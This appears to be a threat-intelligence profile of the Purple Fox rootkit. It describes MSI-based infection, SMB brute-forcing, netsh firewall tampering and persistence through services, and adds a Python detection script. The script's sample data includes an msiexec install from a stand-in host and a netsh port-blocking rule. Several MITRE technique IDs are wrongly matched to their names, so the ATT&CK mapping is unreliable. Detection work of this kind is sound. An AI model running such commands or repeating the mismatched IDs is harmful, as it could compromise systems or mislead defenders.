| Purple Fox | |
|---|---|
| Type of Malware | Rootkit |
| Country of Origin | China |
| Date of initial activity | 2018 |
| Targeted Countries | Ukraine |
| Additional Names | DirtyMoe |
| Associated Groups | Unknown |
| Motivation | Cyberwarfare |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
Overview
Purple Fox, a sophisticated malware first discovered in March 2018, has recently undergone a significant transformation, enhancing its threat profile with advanced propagation techniques. Originally known for exploiting vulnerabilities in Internet Explorer and Windows systems through exploit kits, Purple Fox has evolved beyond its initial methods, showcasing a new and more dangerous capability.
The malware now utilizes compromised servers running outdated versions of Microsoft IIS and FTP services to deliver its initial payloads. Once a system is infected, Purple Fox deploys a sophisticated rootkit to conceal its presence, making it exceptionally difficult to detect and remove. This rootkit, based on an open-source project, enables the malware to hide critical system components and maintain a low profile, further complicating remediation efforts.
Targets
Enterprise and Government: Organizations with exposed Windows servers, especially those using outdated software or with weak security practices, are at risk. This includes various sectors such as finance, healthcare, and government institutions.
Small and Medium Businesses (SMBs): Businesses with insufficient cybersecurity measures or outdated systems can also be targeted. These entities are often less likely to have robust security defenses in place.
Educational Institutions: Schools and universities with vulnerable systems can be targeted, especially those with internet-facing servers that may be poorly secured.
Individual Users: Individuals using Windows machines with weak passwords or outdated software are also potential targets.
How they operate
Initial Infection and Distribution
Purple Fox’s infection vector has evolved over time. Initially, the malware was spread through exploit kits targeting vulnerabilities in Internet Explorer and Windows systems. However, recent variants have shifted to exploiting weak passwords and vulnerabilities in internet-facing Windows machines via SMB (Server Message Block) brute force attacks. Once a vulnerable machine is identified, Purple Fox deploys its payload through compromised servers running outdated versions of Microsoft IIS and FTP services. These servers host MSI (Microsoft Installer) packages that masquerade as legitimate software updates, tricking users into executing them.
Execution and Installation
Upon execution, the MSI installer deploys multiple components of Purple Fox. The installation process involves extracting and decrypting payloads, which include both 64-bit and 32-bit DLL files, and an encrypted rootkit. The rootkit, based on an open-source project, is designed to hide the malware’s presence by obfuscating files, registry entries, and system processes. The installer also modifies Windows Firewall settings using netsh commands to block specific ports and prevent reinfection or interference from other threat actors. Additionally, an IPv6 interface is installed to facilitate network scanning and propagation.
Persistence and Propagation
To ensure persistence, Purple Fox creates a new system service with a name matching a specific regex pattern (e.g., AC01, AC02) that maintains a presence on the infected machine. This service runs a command loop that iterates through URLs containing the MSI installer, ensuring continuous infection of new targets. The malware also employs lateral movement techniques, using port scanners to identify and exploit other vulnerable systems on the network. Brute force tools are utilized to guess SMB passwords, allowing the malware to spread across networked machines.
Defense Evasion and Impact
Purple Fox employs several strategies to evade detection and maintain its foothold. The rootkit component plays a crucial role in hiding the malware’s presence from security tools and system administrators. By leveraging netsh commands to configure firewall rules and block network traffic on specific ports, the malware minimizes the risk of detection and removal. The use of obfuscated MSI installers and the integration of advanced rootkit techniques further complicate the detection and remediation efforts.
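The execution, persistence and defense-evasion behaviours described above (the AC01/AC02-style service name, netsh adding blocking firewall rules, and msiexec fetching an installer from a remote IIS/FTP host) lend themselves to simple host-based hunting logic. The script below is an added example, not code from the original write-up; the exact service-name regex (`^AC\d{2}$`), the rule name, port and URL in the sample data are assumptions constructed for illustration.

```python
import re

# Assumption: the "AC01, AC02"-style names are "AC" followed by exactly two digits.
SERVICE_NAME_RE = re.compile(r"^AC\d{2}$")

# Heuristics for the behaviours in the write-up: netsh used to add a blocking
# firewall rule, and msiexec installing a package straight from an http/ftp URL.
NETSH_BLOCK_RE = re.compile(
    r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=block\b", re.IGNORECASE)
MSIEXEC_REMOTE_RE = re.compile(
    r"msiexec(\.exe)?\b.*\s/i\s+(https?|ftp)://", re.IGNORECASE)

def suspicious_services(service_names):
    """Return service names matching the Purple Fox-style naming pattern."""
    return [n for n in service_names if SERVICE_NAME_RE.match(n)]

def classify_command(cmdline):
    """Map one process command line to a finding label, or None if not matched."""
    if NETSH_BLOCK_RE.search(cmdline):
        return "netsh_block_rule"
    if MSIEXEC_REMOTE_RE.search(cmdline):
        return "msiexec_remote_install"
    return None

def scan(service_names, cmdlines):
    """Combine both checks into a list of (indicator, evidence) findings."""
    findings = [("service_name", s) for s in suspicious_services(service_names)]
    for cmd in cmdlines:
        label = classify_command(cmd)
        if label:
            findings.append((label, cmd))
    return findings

# Constructed sample data (not from a real host): a service list and
# process-creation command lines as Sysmon or an EDR would expose them.
SAMPLE_SERVICES = ["Spooler", "AC01", "WinDefend", "AC17", "ACME Updater"]
SAMPLE_CMDLINES = [
    'netsh advfirewall firewall add rule name="block445" dir=in action=block protocol=TCP localport=445',
    "msiexec.exe /i http://example.invalid/update.msi /q",
    "netsh interface show interface",
    "msiexec.exe /i C:\\Users\\Public\\setup.msi /qn",
]

if __name__ == "__main__":
    for indicator, evidence in scan(SAMPLE_SERVICES, SAMPLE_CMDLINES):
        print(f"[{indicator}] {evidence}")
```

Two of the four command lines and two of the five services are flagged; the local msiexec install and the read-only netsh query are not, which keeps the check from firing on routine administration.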
MITRE Tactics and Techniques
Initial Access
Phishing (T1566): Purple Fox has been distributed through phishing emails containing malicious attachments or links.
Exploitation of Public-Facing Applications (T1190): Early variants exploited vulnerabilities in Internet Explorer and Windows systems.
Execution
Command-Line Interface (T1059): Uses command-line tools such as netsh for network configuration and firewall manipulation.
MSI Installer (T1203): The malware uses MSI installer packages to deploy its payloads, often masquerading as legitimate software updates.
Persistence
Create or Modify System Process (T1543): Implements persistence by creating or modifying system services to ensure continued execution.
Registry Run Keys / Startup Folder (T1547): Modifies registry entries to ensure the malware executes on system startup.
Privilege Escalation
Exploitation for Privilege Escalation (T1068): Uses vulnerabilities to gain elevated privileges on the infected system.
Defense Evasion
Rootkit (T1014): Integrates a rootkit to hide its presence from security tools and system administrators.
Network Layer Protocol (T1040): Utilizes netsh commands to configure firewall rules and block certain network traffic to avoid detection and removal.
Discovery
Network Service Scanning (T1046): Employs port scanning to identify and exploit vulnerable machines on the network.
Lateral Movement
Remote File Copy (T1105): Moves laterally across the network by copying itself to other machines.
Brute Force (T1110): Uses brute force techniques to guess SMB passwords and gain access to other systems.
Impact
Data Obfuscation (T1070): Uses various techniques to obscure its activities and avoid detection.